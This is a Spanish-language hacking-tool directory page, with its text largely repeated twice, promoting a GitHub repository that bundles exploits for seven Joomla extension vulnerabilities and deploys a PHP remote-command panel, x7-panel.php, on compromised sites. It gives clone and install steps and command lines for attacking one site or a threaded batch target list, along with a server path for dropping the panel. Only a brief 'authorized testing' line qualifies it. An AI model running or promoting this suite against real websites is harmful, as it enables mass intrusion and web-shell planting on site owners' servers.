Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-87930 — Suite RCE multi-CVE de Joomla con siete módulos de explotación para Balbooa Forms, Page Builder CK, SP Page Builder, JCE, iCagenda, Helix3 y SP LMS, además del despliegue de payload x7-panel.php. | Kitploit
Herramientas/GitHubGitHub/winrarzipsexploit/cve-2026-87930
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónScripting y AutomatizaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de Penetración
Red Teaming
Herramienta de Acceso Remoto
GitHubwinrarzipsexploit/cve-2026-87930

CVE-2026-87930

Suite RCE multi-CVE de Joomla con siete módulos de explotación para Balbooa Forms, Page Builder CK, SP Page Builder, JCE, iCagenda, Helix3 y SP LMS, además del despliegue de payload x7-panel.php.

Ver Repositorio
1hace 14 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir



🌐 Idioma / Dil

Türkçe English

📌 Resumen

Joomla Multi-CVE Suite — 7 módulos de vulnerabilidad + despliegue de x7-panel.php

CVEExtensión
CVE-2026-56291Balbooa Forms (com_baforms)
CVE-2026-56290Page Builder CK (com_pagebuilderck)
CVE-2026-48908SP Page Builder (com_sppagebuilder)
CVE-2026-48907JCE (com_jce)
CVE-2026-48939iCagenda (com_icagenda)
CVE-2026-49049Helix3 (plg_ajax_helix3)
CVE-2026-48909SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path

La suite ejecuta una cadena automática; usa --cve para un solo módulo.

📦 Instalación

git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
ArchivoFunción
winrarzips_brand.pyBanner de CMD (by winrarzips)
joomla_exploits.pyMódulos de exploit 7-CVE
CVE-2026-Joomla-Suite.pyCLI por lotes + objetivo único
payloads/x7-panel.phpPanel RCE
requirements.txtDependencias

❌ Lista de objetivos, resultados de escaneo y URLs del panel no están en el repo.

🎯 Objetivo único

python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908

📦 Por lotes (tu propia lista)

python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8

🔧 SP LMS (48909)

En objetivos Joomla < 5.2.2 se requiere la ruta del servidor:

python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php

📌 Resumen

Joomla Multi-CVE Suite — 7 módulos de vulnerabilidad + despliegue de x7-panel.php

CVEExtensión
CVE-2026-56291Balbooa Forms (com_baforms)
CVE-2026-56290Page Builder CK (com_pagebuilderck)
CVE-2026-48908SP Page Builder (com_sppagebuilder)
CVE-2026-48907JCE (com_jce)
CVE-2026-48939iCagenda (com_icagenda)
CVE-2026-49049Helix3 (plg_ajax_helix3)
CVE-2026-48909SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path

La suite ejecuta una cadena automática por defecto; usa --cve para un solo módulo.

📦 Configuración

git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
ArchivoFunción
winrarzips_brand.pyBanner de CMD (by winrarzips)
joomla_exploits.pyMódulos de exploit 7-CVE
CVE-2026-Joomla-Suite.pyCLI por lotes + objetivo único
payloads/x7-panel.phpPayload del panel RCE
requirements.txtDependencias

❌ Las listas de objetivos, los resultados de escaneo y las URLs del panel en vivo no están incluidas.

🎯 Objetivo único

python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908

📦 Por lotes (tu propia lista)

python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8

🔧 SP LMS (48909)

Para objetivos Joomla < 5.2.2, proporciona la ruta del servidor:

python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php

⚠️ Solo para pruebas autorizadas / uso en laboratorio · Yalnızca yetkili test


Telegram



Descargar herramienta